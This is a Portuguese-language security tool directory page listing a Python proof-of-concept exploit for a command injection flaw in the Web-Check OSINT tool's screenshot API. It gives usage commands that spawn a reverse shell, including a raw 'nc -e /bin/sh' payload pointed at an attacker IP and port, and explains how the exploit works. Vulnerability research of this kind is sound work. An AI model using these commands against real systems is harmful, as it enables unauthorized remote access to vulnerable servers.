Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32778 — PoC exploit for CVE-2025-32778: command injection in Web-Check OSINT tool | Kitploit
Ferramentas/GitHubGitHub/00xcanelo/cve-2025-32778
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

PoC exploit for CVE-2025-32778: command injection in Web-Check OSINT tool

Ver Repositório
31há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32778 - Exploração de Injeção de Comandos no Web-Check

Critical Language: Python

Descrição

CVE-2025-32778 é uma vulnerabilidade crítica de injeção de comandos na ferramenta OSINT Web-Check de Lissy93.
Permite que atacantes não autenticados executem comandos arbitrários do sistema através do parâmetro url na API de captura de tela.

Este script Python automatiza a exploração e pode gerar shells reversos ou aceitar payloads de shell personalizados.


Aviso

  • Teste apenas em sistemas que você possui ou está autorizado a testar.
  • O uso não autorizado é ilegal e antiético.

Funcionalidades

  • Explorar a injeção de comandos url no Web-Check.
  • Suporta:
    • Shell reverso com --lhost e --lport.
    • Shell personalizado via --shell.
  • Normalização de URL.
  • Impede a combinação de --shell com --lhost/--lport.

Requisitos

  • Python 3.x
  • Biblioteca Requests:
root@kitploit:~
pip install requests

Uso

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778

Fazer a ferramenta criar um shell reverso

root@kitploit:~
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444

Payload de Shell Personalizado (Bruto)

root@kitploit:~
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"

Menu de Ajuda

root@kitploit:~
python3 cve-2025-32778.py -h

Como Funciona

  1. Normalizar a URL alvo para scheme://host[:port].

  2. Preparar o payload:

    • Gerar um shell reverso usando --lhost e --lport.
    • Ou usar um comando bruto de shell com --shell.
  3. Codificar o payload do shell para injeção segura na URL.

  4. Enviar uma requisição HTTP GET para /api/screenshot/ com o payload.

  5. Aguardar a conexão do shell reverso.


🧑‍💻 Autor

00xCanelo
Perfil no GitHub


Referências

  • Repositório do Web-Check no GitHub – Projeto original contendo o código vulnerável.
  • CVE-2025-32778 – Entrada CVE descrevendo a vulnerabilidade de injeção de comandos.
Baixar ferramenta